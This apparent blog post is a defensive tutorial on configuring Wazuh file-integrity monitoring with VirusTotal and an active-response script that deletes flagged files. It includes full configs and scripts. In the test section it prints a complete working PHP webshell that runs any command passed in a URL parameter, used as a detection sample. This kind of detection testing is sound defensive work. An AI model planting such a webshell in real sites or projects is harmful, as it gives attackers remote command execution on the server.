Blue Teaming with Wazuh Pt 3: Detecting and Removing Threats with VirusTotal Integration

Daniel Edwards
5 min read · Dec 29, 2023


Wazuh’s File Integrity Monitoring module can be connected to the VirusTotal API, so that files added to or changed in our monitored directories are checked against VirusTotal and alerted on. When active response is enabled, files that VirusTotal flags as malicious are removed automatically.

Requirements:

  • VirusTotal API Key
  • Attacker Machine
  • Victim Machine(s)
  • Wazuh Agents on each machine
  • jq, to parse JSON (the alert passed to the active response script)
  • A script to delete the malicious file
  • Malware samples

Prepare the ossec.conf of the Agent on the Ubuntu Target

Configure the appropriate settings so that Wazuh monitors our intended directory. On each victim machine, edit the ossec.conf file (the Wazuh agent’s configuration file).

1. Install jq:

sudo apt update
sudo apt -y install jq

2. In /var/ossec/etc/ossec.conf search for the field <syscheck> and set <disabled> to no.

3. Place your intended directory, e.g. Downloads, under the File Integrity Monitoring section:

<directories realtime="yes">/home/user/Downloads</directories>

4. Create a bash script at /var/ossec/active-response/bin/remove-threat.sh to remove the suspect file:

#!/bin/bash
# Active response script: deletes the file named in the VirusTotal alert.
# execd passes the alert as a single JSON line on stdin.

LOCAL=$(dirname "$0")
cd "$LOCAL" || exit 1
cd ../ || exit 1

BASE_DIR=$(pwd)   # /var/ossec/active-response

read -r INPUT_JSON
FILENAME=$(echo "$INPUT_JSON" | jq -r .parameters.alert.data.virustotal.source.file)
COMMAND=$(echo "$INPUT_JSON" | jq -r .command)
LOG_FILE="${BASE_DIR}/../logs/active-responses.log"

#------------------------ Analyze command -------------------------#
if [ "${COMMAND}" = "add" ]
then
  # Send control message to execd and wait for its decision
  printf '{"version":1,"origin":{"name":"remove-threat","module":"active-response"},"command":"check_keys", "parameters":{"keys":[]}}\n'

  read -r RESPONSE
  COMMAND2=$(echo "$RESPONSE" | jq -r .command)
  if [ "${COMMAND2}" != "continue" ]
  then
    echo "$(date '+%Y/%m/%d %H:%M:%S') $0: $INPUT_JSON Remove threat active response aborted" >> "${LOG_FILE}"
    exit 0
  fi
fi

# Removing file
if rm -f "$FILENAME"; then
  echo "$(date '+%Y/%m/%d %H:%M:%S') $0: $INPUT_JSON Successfully removed threat" >> "${LOG_FILE}"
else
  echo "$(date '+%Y/%m/%d %H:%M:%S') $0: $INPUT_JSON Error removing threat" >> "${LOG_FILE}"
fi

exit 0

5. Change the permissions and ownership of the newly created script:

sudo chmod 750 /var/ossec/active-response/bin/remove-threat.sh; sudo chown root:wazuh /var/ossec/active-response/bin/remove-threat.sh

6. Apply the changes by restarting the Wazuh agent:

sudo systemctl restart wazuh-agent
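The script above deletes whatever path the alert carries. The handler below is an added example, not the post’s or Wazuh’s code: it implements the same execd exchange (alert on stdin, check_keys reply, wait for continue) but refuses any path that resolves outside the monitored directory. It assumes /home/dan/Downloads as the monitored directory; the function names are hypothetical.

```python
#!/usr/bin/env python3
# Active response handler with the same stdin/stdout exchange as remove-threat.sh,
# plus a guard so only files inside the monitored directory are ever deleted.
import json
import os
import sys
import time
from pathlib import Path
from typing import Optional

# Assumption: the directory configured in <directories> on the agent.
MONITORED_DIR = Path("/home/dan/Downloads")
LOG_FILE = "/var/ossec/logs/active-responses.log"

def flagged_file(alert: dict) -> Optional[str]:
    """Return parameters.alert.data.virustotal.source.file, or None if absent."""
    try:
        return alert["parameters"]["alert"]["data"]["virustotal"]["source"]["file"]
    except (KeyError, TypeError):
        return None

def is_inside(path: str, root: Path) -> bool:
    """True only if path resolves under root, so '..' and symlinks cannot escape it."""
    return root.resolve() in Path(path).resolve().parents

def handle(stdin, stdout, remove, monitored: Path = MONITORED_DIR) -> str:
    """Run one exchange with execd; return the message the logging rules match on."""
    alert = json.loads(stdin.readline())
    if alert.get("command") == "add":
        # Same control message the bash script prints; execd answers with a command.
        stdout.write(json.dumps({"version": 1,
                                 "origin": {"name": "remove-threat", "module": "active-response"},
                                 "command": "check_keys", "parameters": {"keys": []}}) + "\n")
        stdout.flush()
        reply = json.loads(stdin.readline())
        if reply.get("command") != "continue":
            return "Remove threat active response aborted"
    target = flagged_file(alert)
    if target is None or not is_inside(target, monitored):
        return "Error removing threat"  # missing path, or outside the monitored directory
    try:
        remove(target)
    except OSError:
        return "Error removing threat"
    return "Successfully removed threat"

if __name__ == "__main__":
    outcome = handle(sys.stdin, sys.stdout, os.remove)
    with open(LOG_FILE, "a") as log:
        log.write(f"{time.strftime('%Y/%m/%d %H:%M:%S')} {sys.argv[0]}: {outcome}\n")
```

The returned strings are the ones rules 100092 and 100093 match on, so the same logging rules work unchanged.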

Wazuh Server Configuration

The Ubuntu endpoint is now configured; on to the Wazuh server. These changes allow alerts in near real time, and active response will be triggered when a suspect file is detected. The files we’ll be editing:

  • ossec.conf
  • local_rules.xml
  • remove-threat.sh

Edit the /var/ossec/etc/rules/local_rules.xml file to include the following rules:

<group name="syscheck,pci_dss_11.5,nist_800_53_SI.7,">
  <!-- Rules for Linux systems -->
  <rule id="100200" level="7">
    <if_sid>550</if_sid>
    <field name="file">/home/dan/Downloads</field>
    <description>File modified in /home/dan/Downloads directory.</description>
  </rule>
  <rule id="100201" level="7">
    <if_sid>554</if_sid>
    <field name="file">/home/dan/Downloads</field>
    <description>File added to /home/dan/Downloads directory.</description>
  </rule>
</group>

Remember to change your directory path!

Enable the VirusTotal integration by editing the /var/ossec/etc/ossec.conf file. Be sure to replace <YOUR_VIRUS_TOTAL_API_KEY> with your VirusTotal API key. When rule IDs 100200 and 100201 are triggered, the integration will query VirusTotal.

<ossec_config>
  <integration>
    <name>virustotal</name>
    <api_key><YOUR_VIRUS_TOTAL_API_KEY></api_key> <!-- Replace with your VirusTotal API key -->
    <rule_id>100200,100201</rule_id>
    <alert_format>json</alert_format>
  </integration>
</ossec_config>

Enable active response to execute the remove-threat.sh script. This will trigger whenever VirusTotal flags a file as malicious (rule 87105). Make the following edits to /var/ossec/etc/ossec.conf:

<ossec_config>
  <command>
    <name>remove-threat</name>
    <executable>remove-threat.sh</executable>
    <timeout_allowed>no</timeout_allowed>
  </command>

  <active-response>
    <disabled>no</disabled>
    <command>remove-threat</command>
    <location>local</location>
    <rules_id>87105</rules_id>
  </active-response>
</ossec_config>

Add the following rules to /var/ossec/etc/rules/local_rules.xml to ensure Wazuh receives the alert about the results from active response:

<group name="virustotal,">
  <rule id="100092" level="12">
    <if_sid>657</if_sid>
    <match>Successfully removed threat</match>
    <description>$(parameters.program) removed threat located at $(parameters.alert.data.virustotal.source.file)</description>
  </rule>

  <rule id="100093" level="12">
    <if_sid>657</if_sid>
    <match>Error removing threat</match>
    <description>Error removing threat located at $(parameters.alert.data.virustotal.source.file)</description>
  </rule>
</group>

Restart the Wazuh manager:

sudo systemctl restart wazuh-manager

HINT: If Wazuh gives you the following error message: “Job for wazuh-manager.service failed because the control process exited with error code. journalctl -xeu wazuh-manager service”, verify your ossec.conf file with xmllint. It will identify configuration errors and point you in the right direction.

Executing Attacks

In order to simulate and view our attacks in Wazuh we need to place agents on both the attacker and victim machines to monitor their activity. Check out my first article in this series to learn how.

We’ll also be using real malware from these sources. Please be VERY careful when executing these and ensure your virtual machines are not touching your main network!

Test 1: EICAR file

On the Ubuntu machine, run the following curl command in the Downloads folder. The gif below also shows how quickly Wazuh removes the EICAR file:

curl -LO https://secure.eicar.org/eicar.com && ls -lah eicar.com

  • Wazuh detected the file being downloaded in the /home/dan directory
  • A VirusTotal alert was generated, indicating 66 detection engines detected the file (MITRE ATT&CK technique T1203)
  • The file was deleted, showing the tactics, techniques and sub-techniques utilized
  • The active response script, remove-threat.sh, activated and removed the file

GIF: Wazuh detecting and removing the EICAR file

Test 2: PHP Webshell

Use the following code from github.com/joswr1ght to test webshell detection and removal:

<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['cmd']))
{
system($_GET['cmd']);
}
?>
</pre>
</body>
</html>

Source: easy-simple-php-webshell.php, https://gist.github.com/joswr1ght/22f40787de19d80d110b37fb79ac3985

The same four alerts are generated for this download, though it took a bit longer to analyze and remove the PHP shell.

Conclusion

We’ve tested Wazuh’s detection capabilities integrated with VirusTotal and I have to say, I’m quite impressed. This integration is quite powerful; I may make a future edit to see what else it can detect, configure it to monitor other directories, etc. If you have any ideas, questions, comments and/or concerns, please let me know!


Daniel Edwards

Padawan Pentester and dabbler in many things infoSec related